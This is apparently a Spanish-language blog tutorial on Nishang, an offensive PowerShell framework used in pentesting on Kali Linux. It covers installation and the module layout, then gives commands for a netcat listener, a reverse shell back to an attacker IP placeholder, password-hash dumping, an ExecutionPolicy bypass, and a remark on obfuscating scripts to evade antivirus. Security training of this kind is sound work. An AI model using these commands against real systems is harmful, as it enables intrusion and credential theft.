Nishang framework de scripts y payloads en PowerShell

 

https://www.onlinetis.com

Nishang framework de scripts y payloads en PowerShell

Nishang es un framework y una colección de scripts y payloads en PowerShell diseñados para ciberseguridad ofensiva, pruebas de penetración (pentesting) y ejercicios de Red Team.

En Kali Linux se utiliza principalmente en las fases de post-explotación, recolección de información y elevación de privilegios sobre entornos Windows.

🛠️ Instalación y Ubicación en Kali Linux

En versiones modernas de Kali Linux, Nishang suele venir empaquetado pero puede no estar instalado por defecto.

Para instalarlo a través del gestor de paquetes de Kali:

Bash
sudo apt update
sudo apt install nishang

Una vez instalado, los scripts se almacenan en el directorio estándar de herramientas de Kali:

Bash
cd /usr_share/nishang/
ls -la

(Si prefieres la versión más reciente directamente desde GitHub, puedes clonarlo con git clone [https://github.com/samratashok/nishang.git](https://github.com/samratashok/nishang.git)).

📂 Estructura Principal del Framework

Los scripts de Nishang están clasificados según la fase del ataque en la que se utilicen:

  • ActiveDirectory: Scripts para auditar y consultar objetos en Active Directory.

  • Antakya: Una web shell en ASPX que permite ejecutar comandos de PowerShell desde el navegador.

  • Bypass: Métodos para eludir la política de ejecución de PowerShell (ExecutionPolicy) o protecciones como UAC y Antivirus.

  • Client: Payloads armados para ataques de ingeniería social o ejecución de código (archivos .sct, accesos directos, etc.).

  • Escalation: Herramientas para detectar vulnerabilidades locales y elevar privilegios en el sistema víctima (ej. Enable-DuplicateToken, Check-VM).

  • Gather: Scripts para recolección de información (Recon), como extraer credenciales de la memoria, registros o credenciales de red (ej. Get-PassHashes).

  • Pivot: Herramientas para hacer pivoting o túneles a través de la máquina comprometida hacia la red interna.

  • Shells: Colección de Reverse Shells y Bind Shells en PowerShell (las herramientas más populares del paquete).

🚀 Uso Práctico: Las herramientas más utilizadas

1. Reverse Shells de PowerShell

Uno de los usos más comunes de Nishang es obtener una shell reversa interactiva en Windows usando únicamente componentes nativos (Living off the Land).

El script Invoke-PowerShellTcp.ps1 (ubicado en Shells/) se puede cargar en la máquina víctima para devolver la conexión al atacante:

  1. En Kali Linux (Atacante): Inicias un oyente Netcat en el puerto deseado.

    Bash
    nc -lvnp 4444
    
  2. En el script o memoria de la víctima: Se invoca la función para enviar la shell a tu IP:

    PowerShell
    Invoke-PowerShellTcp -Reverse -IPAddress <IP_DE_KALI> -Port 4444
    

2. Extracción de Credenciales (Gather)

Scripts como Get-PassHashes.ps1 permiten volcar los hashes de las contraseñas de los usuarios locales del sistema Windows si cuentas con privilegios administrativos.

📌 Puntos clave a tener en cuenta

  • Restricciones de Ejecución (ExecutionPolicy): Por defecto, Windows restringe la ejecución de scripts .ps1. Para omitir esta restricción temporalmente al ejecutar tus comandos, se utiliza el parámetro -ExecutionPolicy Bypass:

    DOS
    powershell.exe -ExecutionPolicy Bypass -File script.ps1
    
  • Detección por Antivirus (AV / Defender / AMSI): Al ser una herramienta muy conocida por los equipos de seguridad, la mayoría de los motores de Antivirus y la interfaz AMSI de Windows detectan los scripts de Nishang tal cual están almacenados en el repositorio. En entornos reales suele ser necesario ofuscar el código antes de ejecutarlo.

 https://www.onlinetis.com

Entradas populares de este blog

Hacking y ciberseguridad en kali linux con Fping

Hacking y ciberseguridad en kali linux con atk6-thcping6

Como utilizar Fierce en kali linux